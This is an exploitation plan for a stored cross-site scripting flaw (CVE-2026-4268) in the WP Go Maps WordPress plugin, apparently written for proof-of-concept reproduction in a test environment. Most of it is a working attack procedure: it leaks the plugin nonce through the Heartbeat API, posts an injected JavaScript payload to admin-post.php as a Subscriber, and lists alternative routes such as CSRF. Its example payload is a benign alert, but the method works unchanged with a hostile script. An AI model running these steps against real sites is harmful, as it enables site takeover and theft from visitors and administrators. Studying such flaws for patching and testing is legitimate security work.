Exploitation Research Plan: CVE-2026-4268 (WP Go Maps Stored XSS)

1. Vulnerability Summary

The WP Go Maps (formerly WP Google Maps) plugin (up to 10.0.05) contains a stored cross-site scripting (XSS) vulnerability due to missing authorization and insufficient sanitization in the admin_post_wpgmza_save_settings action handler. The plugin registers a global admin post hook that allows any authenticated user (Subscriber level and above) to update plugin settings, including the wpgmza_custom_js field, which is explicitly exempted from sanitization. This allows an attacker to inject arbitrary JavaScript that executes whenever a map is rendered on the site or when an administrator visits the plugin settings page.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-post.php
• Action: wpgmza_save_settings (triggered via the admin_post_wpgmza_save_settings hook)
• Vulnerable Parameter: wpgmza_custom_js
• Required Authentication: Subscriber level (any logged-in user).
• Required Nonce: A nonce for the action is required, but it is exposed to logged-in users via the WordPress Heartbeat API or potentially the settings page itself if access levels are misconfigured.

3. Code Flow

1. Entry Point: The plugin registers the action in includes/class.settings-page.php:

   add_action('admin_post_wpgmza_save_settings', function() {
       $settingsPage = SettingsPage::createInstance();
   });
   

2. Initialization: SettingsPage::createInstance() instantiates the SettingsPage class.
3. Execution Sink: The SettingsPage::__construct() method (in includes/class.settings-page.php) handles the request:
   • It checks if(empty($_POST)). Since we are sending a POST request, it enters the else block.
   • It performs a nonce check: if(!$this->isNonceValid($this->form, $_POST['nonce'])).
   • It iterates through $_POST data and performs sanitization except for wpgmza_custom_js:

     if($key === "wpgmza_custom_js"){
         // Skip custom javascript, they should be used with user caution, we can't fully clean these
         continue;
     }
     

   • It saves the data into the global $wpgmza->settings object:

     foreach($data as $key => $value){
         $wpgmza->settings->{$key} = $value;
     }
     

   • Crucially, there is no call to current_user_can() or any other capability check before these settings are persisted to the database.

4. Nonce Acquisition Strategy

The plugin uses a nonce to protect the settings form. Based on includes/class.admin-ui.php, the plugin registers a filter to refresh nonces via the Heartbeat API.

Heartbeat API Leak

The function onAdminRefreshNonces in includes/class.admin-ui.php reveals the nonce action:

public function onAdminRefreshNonces($nonces){
    if(!empty($_POST) && !empty($_POST['screen_id'])){
        if(strpos($_POST['screen_id'], 'wp-google-maps') !== FALSE){
            /* Looking at a WP Go Maps Related page */
            $action = admin_url('admin-post.php');
            $nonces['wpgmza_nonce'] = wp_create_nonce("wpgmza_$action");
        }
    }
    return $nonces;
}

Strategy:

1. Login as a Subscriber user.
2. Navigate to wp-admin/index.php.
3. Use http_request to send a POST request to wp-admin/admin-ajax.php with:
   • action=heartbeat
   • screen_id=wp-google-maps-settings (to trigger the strpos check)
   • _nonce (the standard WordPress heartbeat nonce, visible in the wp-admin source)
4. Extract wpgmza_nonce from the JSON response.

Alternatively: Check if the Subscriber user can access wp-admin/admin.php?page=wp-google-maps-menu-settings directly. If the plugin's default access level is low, the nonce will be directly in the HTML.

5. Exploitation Strategy

1. Login: Authenticate as a Subscriber.
2. Obtain Nonce:
   • Navigate to /wp-admin/index.php.
   • Execute JS via browser_eval to fetch the heartbeat nonce: wp.heartbeat.post('wpgmza', {screen_id: 'wp-google-maps'}, (response) => { console.log(response.wpgmza_nonce); }).
   • Or manually fetch admin-ajax.php using http_request.
3. Inject Payload:
   • Send a POST request to /wp-admin/admin-post.php using http_request.
   • Body:
     • action=wpgmza_save_settings
     • nonce=[EXTRACTED_NONCE]
     • wpgmza_custom_js=alert("XSS_EXPLOITED_" + document.domain);
   • Headers: Content-Type: application/x-www-form-urlencoded
4. Trigger XSS:
   • Navigate to any page containing a map shortcode [wp-google-maps] or the plugin's settings page as an administrator.

6. Test Data Setup

1. Users: Create a Subscriber user (e.g., attacker/attacker).
2. Map Content: Ensure at least one map exists.
   • wp google-map create --map_title="Test Map"
3. Trigger Page: Create a public page displaying the map.
   • wp post create --post_type=page --post_title="Map Page" --post_status=publish --post_content='[wp-google-maps id="1"]'

7. Expected Results

• The POST request to admin-post.php should return a 302 Redirect back to the referrer (indicating success) or a 200 OK without error.
• The wpgmza_settings option in the database will now contain the malicious JavaScript.
• When any user visits the "Map Page", an alert box with XSS_EXPLOITED_[domain] will appear.

8. Verification Steps

1. Database Check:
   wp option get wpgmza_settings --format=json
   Check if the wpgmza_custom_js key contains the payload.
2. Frontend Verification:
   Navigate to the "Map Page" using browser_navigate and check for the presence of the script or the alert.

9. Alternative Approaches

• Access Level Manipulation: In some configurations, the plugin allows administrators to lower the "Access Level" for map management. If this is set to read, the Subscriber can access the settings UI directly.
• CSRF: Since the authorization check is missing, if the nonce can be bypassed or predicted, this becomes a CSRF vector against an Administrator to change plugin settings.
• Heartbeat Spoofing: If wp_refresh_nonces is active, any admin-ajax.php request that triggers the heartbeat action with the correct screen_id will leak the nonce required for the settings update.